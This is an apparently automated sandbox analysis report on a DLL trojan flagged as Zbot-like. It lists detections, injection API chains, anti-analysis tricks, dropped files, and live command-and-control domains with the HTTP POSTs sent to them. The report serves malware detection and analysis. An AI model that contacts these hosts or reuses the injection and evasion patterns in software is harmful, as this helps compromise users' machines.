
Analysis Report cXQT5g

Overview

General Information

Sample Name: cXQT5g (renamed file extension from none to dll)
Analysis ID: 303342
MD5: 5fccb5a81839cc682a559febbea7dd99
SHA1: 6e50ebce2b1791527aa79005dc0fb35cc65a1249
SHA256: e37e83f6d5e73a831beed5fe4375bd70caecdad3ef39c579e398f66a75ea4d5a

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Binary contains a suspicious time stamp
Contains functionality to inject code into remote processes
Found C&C like URL pattern
Machine Learning detection for dropped file
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the product ID of Windows
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6520 cmdline: loaddll32.exe 'C:\Users\user\Desktop\cXQT5g.dll' MD5: 6A3082E6152C823BF9EB895EA06EA605)
    • msiexec.exe (PID: 4448 cmdline: msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://wingtonwelbemdon.com/web/post.php | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://wingtonwelbemdon.com/web/post.php | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: cXQT5g.dll | Virustotal: Detection: 10%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Omne\fapud.dll | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: cXQT5g.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014DF70 FindFirstFileW,FindNextFileW | 18_2_0014DF70
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, esi | 1_2_6E499AE0
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 1_2_6E4A7F10
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edi] | 1_2_6E4A5F30
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movsx edi, byte ptr [ebx+eax] | 1_2_6E4A8FA0
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then test di, di | 1_2_6E4A6C60
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov ecx, dword ptr [6E4B2090h+eax*4] | 1_2_6E4A4C00
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi | 1_2_6E4A70F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then lea esi, dword ptr [ebp-34h] | 1_2_6E4A1D00
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then movzx edx, word ptr [ecx] | 1_2_6E4A9530
Source: C:\Windows\System32\loaddll32.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h] | 1_2_6E4AB1B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov eax, esi | 18_2_00149AE0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov ecx, dword ptr [00162090h+eax*4] | 18_2_00154C00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then test di, di | 18_2_00156C60
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov dword ptr [ebp-10h], esi | 18_2_001570F0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then lea esi, dword ptr [ebp-34h] | 18_2_00151D00
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx edx, word ptr [ecx] | 18_2_00159530
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov eax, dword ptr [ebp+08h] | 18_2_0015B1B0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+ebx] | 18_2_00157F10
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movzx eax, byte ptr [esi+edi] | 18_2_00155F30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then movsx edi, byte ptr [ebx+eax] | 18_2_00158FA0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2019141 ET TROJAN Zbot POST Request to C2 | 192.168.2.3:49739 -> 91.203.192.40:80
Source: Traffic | Snort IDS: 2019141 ET TROJAN Zbot POST Request to C2 | 192.168.2.3:49740 -> 91.203.192.40:80
Found C&C like URL pattern
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: wingtonwelbemdon.com | Content-Length: 429 | Connection: Close | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /web/post.php HTTP/1.1 | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 | Host: donburitimesofindia.com | Content-Length: 285 | Connection: Close | Cache-Control: no-cache
Source: Joe Sandbox View | ASN Name: GARANT-PARK-INTERNETRU GARANT-PARK-INTERNETRU
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00152C60 InternetReadFile | 18_2_00152C60
Source: unknown | DNS traffic detected: queries for: wingtonwelbemdon.com
Source: C:\Windows\System32\loaddll32.exe | Process Stats: CPU usage > 98%
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4AC9D0 | 1_2_6E4AC9D0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015F410 | 18_2_0015F410
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015F4BC | 18_2_0015F4BC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0015C9D0 | 18_2_0015C9D0
Source: cXQT5g.dll | Binary or memory string: OriginalFilenameCaptain.dllD vs cXQT5g.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: cXQT5g.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: fapud.dll.18.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal92.troj.evad.winDLL@3/2@3/1
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49FDC0 LookupPrivilegeValueW,AdjustTokenPrivileges | 1_2_6E49FDC0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_00143B10 AdjustTokenPrivileges,FindCloseChangeNotification | 18_2_00143B10
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E498EB0 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW | 1_2_6E498EB0
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Omne
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{9AD2E113-FD6E-1193-7CD4-CAAB82FC3C29}
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BAAAD113-CD6E-31EB-7CD4-CAAB82FC3C29}
Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\{0A43D38F-CFF2-8102-7CD4-CAAB82FC3C29}
Source: C:\Windows\System32\loaddll32.exe | File created: C:\Users\user\AppData\Local\Temp\tmp.txt
Source: cXQT5g.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msiexec.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: cXQT5g.dll | Virustotal: Detection: 10%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\cXQT5g.dll'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cXQT5g.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: cXQT5g.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\62\10\Six\Need\shoe\85\48\Name\23\43\Felt\Our\Captain.pdb | source: loaddll32.exe, 00000001.00000002.459411505.000000006E51D000.00000002.00020000.sdmp, msiexec.exe, 00000012.00000003.464541289.0000000004400000.00000004.00000001.sdmp, cXQT5g.dll
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cXQT5g.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0x6173D010 [Sat Oct 23 09:04:16 2021 UTC]
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress | 1_2_6E4A70F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B5E7D push ebx; iretd | 1_2_6E4B5E83
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B727C push ebx; retf | 1_2_6E4B72EB
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7038 push dword ptr [ebp-773E11F7h]; ret | 1_2_6E4B705D
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B6EE2 pushfd ; retf | 1_2_6E4B6F4F
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B72A3 push ebx; retf | 1_2_6E4B72EB
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7B4B push eax; iretd | 1_2_6E4B7B7F
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B6F44 pushfd ; retf | 1_2_6E4B6F4F
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B7B67 push eax; iretd | 1_2_6E4B7B7F
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4BA170 push esp; retf | 1_2_6E4BA186
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4B75A4 push edi; iretd | 1_2_6E4B75A5
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E5359D5 push esi; ret | 1_2_6E5359DE
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Roaming\Omne\fapud.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Omne\fapud.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_18-14445
Source: C:\Windows\System32\loaddll32.exe TID: 6524 | Thread sleep count: 294 > 30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014DF70 FindFirstFileW,FindNextFileW | 18_2_0014DF70
Source: C:\Windows\System32\loaddll32.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4A70F0 LoadLibraryA,GetProcAddress | 1_2_6E4A70F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49F390 mov eax, dword ptr fs:[00000030h] | 1_2_6E49F390
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E533EB5 mov eax, dword ptr fs:[00000030h] | 1_2_6E533EB5
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E5339F3 push dword ptr fs:[00000030h] | 1_2_6E5339F3
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E533DEB mov eax, dword ptr fs:[00000030h] | 1_2_6E533DEB
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 18_2_0014F390 mov eax, dword ptr fs:[00000030h] | 18_2_0014F390
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E4AC590 GetProcessHeap,HeapAlloc,GetTempPathW,GetFileAttributesW,DeleteFileW,HeapFree | 1_2_6E4AC590
Source: C:\Windows\System32\loaddll32.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_6E49B100 VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,GetThreadContext,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess | 1_2_6E49B100
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: msiexec.exe, 00000012.00000002.470677719.0000000002B30000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Native API2 | DLL Side-Loading1 | Access Token Manipulation1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection112 | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading1 | Access Token Manipulation1 | Security Account Manager | Process Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection112 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol112 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information2 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing1 | Cached Domain Credentials | System Information Discovery12 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
